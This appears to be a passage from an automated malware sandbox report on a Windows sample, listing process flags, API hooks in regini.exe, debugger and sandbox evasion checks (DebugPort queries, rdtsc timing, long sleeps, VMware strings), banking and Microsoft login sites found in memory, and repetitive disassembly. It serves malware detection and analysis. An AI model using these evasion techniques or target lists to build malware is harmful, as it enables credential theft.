                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: C6Abn5cBei.exe PID: 2916, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: zdDlscHlw.exe PID: 2884, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Memory allocated: A10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Memory allocated: 2620000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Memory allocated: 2460000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Memory allocated: 7400000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Memory allocated: 6C40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Memory allocated: 8400000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Memory allocated: 9400000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Memory allocated: 1760000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Memory allocated: 31B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Memory allocated: 51B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Memory allocated: 7990000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Memory allocated: 8990000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Memory allocated: 8B20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Memory allocated: 9B20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_011C096E rdtsc 9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3424
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3338
                Source: C:\Windows\SysWOW64\regini.exe Window / User API: threadDelayed 4044
                Source: C:\Windows\SysWOW64\regini.exe Window / User API: threadDelayed 5927
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe API coverage: 0.7 %
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe API coverage: 0.2 %
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe TID: 5640 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680 Thread sleep count: 3424 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4940 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe TID: 3456 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632 Thread sleep count: 4044 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632 Thread sleep time: -8088000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632 Thread sleep count: 5927 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 6632 Thread sleep time: -11854000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Thread delayed: delay time: 922337203685477
                Source: 7-6E2al6.17.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: discord.comVMware20,11696494690f
                Source: 7-6E2al6.17.dr Binary or memory string: AMC password management pageVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: 7-6E2al6.17.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 7-6E2al6.17.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 7-6E2al6.17.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 7-6E2al6.17.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 7-6E2al6.17.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 7-6E2al6.17.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 7-6E2al6.17.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 7-6E2al6.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 7-6E2al6.17.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: regini.exe, 00000011.00000002.2686703437.000000000339D000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000002.2687933047.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 7-6E2al6.17.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 00000016.00000002.2197462856.000002BCC59DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu
                Source: 7-6E2al6.17.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 7-6E2al6.17.dr Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: 7-6E2al6.17.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: zdDlscHlw.exe, 0000000A.00000002.1740402895.000000000145E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 7-6E2al6.17.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: 7-6E2al6.17.dr Binary or memory string: global block list test formVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 7-6E2al6.17.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 7-6E2al6.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 7-6E2al6.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 7-6E2al6.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 7-6E2al6.17.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 7-6E2al6.17.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\regini.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_011C096E rdtsc 9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_00417833 LdrLoadDll,9_2_00417833
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov eax, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122E10E mov ecx, dword ptr fs:[00000030h]9_2_0122E10E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_01240115 mov eax, dword ptr fs:[00000030h]9_2_01240115
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122A118 mov ecx, dword ptr fs:[00000030h]9_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0122A118 mov eax, dword ptr fs:[00000030h]9_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_011B0124 mov eax, dword ptr fs:[00000030h]9_2_011B0124
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_0117C156 mov eax, dword ptr fs:[00000030h]9_2_0117C156
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_01186154 mov eax, dword ptr fs:[00000030h]9_2_01186154
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe Code function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov ecx, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01214144 mov eax, dword ptr fs:[00000030h]9_2_01214144
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01218158 mov eax, dword ptr fs:[00000030h]9_2_01218158
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A197 mov eax, dword ptr fs:[00000030h]9_2_0117A197
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A197 mov eax, dword ptr fs:[00000030h]9_2_0117A197
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A197 mov eax, dword ptr fs:[00000030h]9_2_0117A197
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C0185 mov eax, dword ptr fs:[00000030h]9_2_011C0185
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01224180 mov eax, dword ptr fs:[00000030h]9_2_01224180
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01224180 mov eax, dword ptr fs:[00000030h]9_2_01224180
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123C188 mov eax, dword ptr fs:[00000030h]9_2_0123C188
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123C188 mov eax, dword ptr fs:[00000030h]9_2_0123C188
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120019F mov eax, dword ptr fs:[00000030h]9_2_0120019F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012561E5 mov eax, dword ptr fs:[00000030h]9_2_012561E5
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov ecx, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE1D0 mov eax, dword ptr fs:[00000030h]9_2_011FE1D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B01F8 mov eax, dword ptr fs:[00000030h]9_2_011B01F8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012461C3 mov eax, dword ptr fs:[00000030h]9_2_012461C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012461C3 mov eax, dword ptr fs:[00000030h]9_2_012461C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E016 mov eax, dword ptr fs:[00000030h]9_2_0119E016
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216030 mov eax, dword ptr fs:[00000030h]9_2_01216030
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01204000 mov ecx, dword ptr fs:[00000030h]9_2_01204000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01222000 mov eax, dword ptr fs:[00000030h]9_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A020 mov eax, dword ptr fs:[00000030h]9_2_0117A020
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C020 mov eax, dword ptr fs:[00000030h]9_2_0117C020
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182050 mov eax, dword ptr fs:[00000030h]9_2_01182050
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AC073 mov eax, dword ptr fs:[00000030h]9_2_011AC073
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206050 mov eax, dword ptr fs:[00000030h]9_2_01206050
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012180A8 mov eax, dword ptr fs:[00000030h]9_2_012180A8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118208A mov eax, dword ptr fs:[00000030h]9_2_0118208A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012460B8 mov eax, dword ptr fs:[00000030h]9_2_012460B8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012460B8 mov ecx, dword ptr fs:[00000030h]9_2_012460B8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012060E0 mov eax, dword ptr fs:[00000030h]9_2_012060E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C0F0 mov eax, dword ptr fs:[00000030h]9_2_0117C0F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C20F0 mov ecx, dword ptr fs:[00000030h]9_2_011C20F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011880E9 mov eax, dword ptr fs:[00000030h]9_2_011880E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0117A0E3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012020DE mov eax, dword ptr fs:[00000030h]9_2_012020DE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C310 mov ecx, dword ptr fs:[00000030h]9_2_0117C310
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A0310 mov ecx, dword ptr fs:[00000030h]9_2_011A0310
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA30B mov eax, dword ptr fs:[00000030h]9_2_011BA30B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA30B mov eax, dword ptr fs:[00000030h]9_2_011BA30B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA30B mov eax, dword ptr fs:[00000030h]9_2_011BA30B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122437C mov eax, dword ptr fs:[00000030h]9_2_0122437C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01202349 mov eax, dword ptr fs:[00000030h]9_2_01202349
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01228350 mov ecx, dword ptr fs:[00000030h]9_2_01228350
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124A352 mov eax, dword ptr fs:[00000030h]9_2_0124A352
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov ecx, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120035C mov eax, dword ptr fs:[00000030h]9_2_0120035C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178397 mov eax, dword ptr fs:[00000030h]9_2_01178397
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178397 mov eax, dword ptr fs:[00000030h]9_2_01178397
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178397 mov eax, dword ptr fs:[00000030h]9_2_01178397
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A438F mov eax, dword ptr fs:[00000030h]9_2_011A438F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A438F mov eax, dword ptr fs:[00000030h]9_2_011A438F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E388 mov eax, dword ptr fs:[00000030h]9_2_0117E388
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E388 mov eax, dword ptr fs:[00000030h]9_2_0117E388
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E388 mov eax, dword ptr fs:[00000030h]9_2_0117E388
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A3C0 mov eax, dword ptr fs:[00000030h]9_2_0118A3C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011883C0 mov eax, dword ptr fs:[00000030h]9_2_011883C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012063C0 mov eax, dword ptr fs:[00000030h]9_2_012063C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B63FF mov eax, dword ptr fs:[00000030h]9_2_011B63FF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F0 mov eax, dword ptr fs:[00000030h]9_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F0 mov eax, dword ptr fs:[00000030h]9_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F0 mov eax, dword ptr fs:[00000030h]9_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123C3CD mov eax, dword ptr fs:[00000030h]9_2_0123C3CD
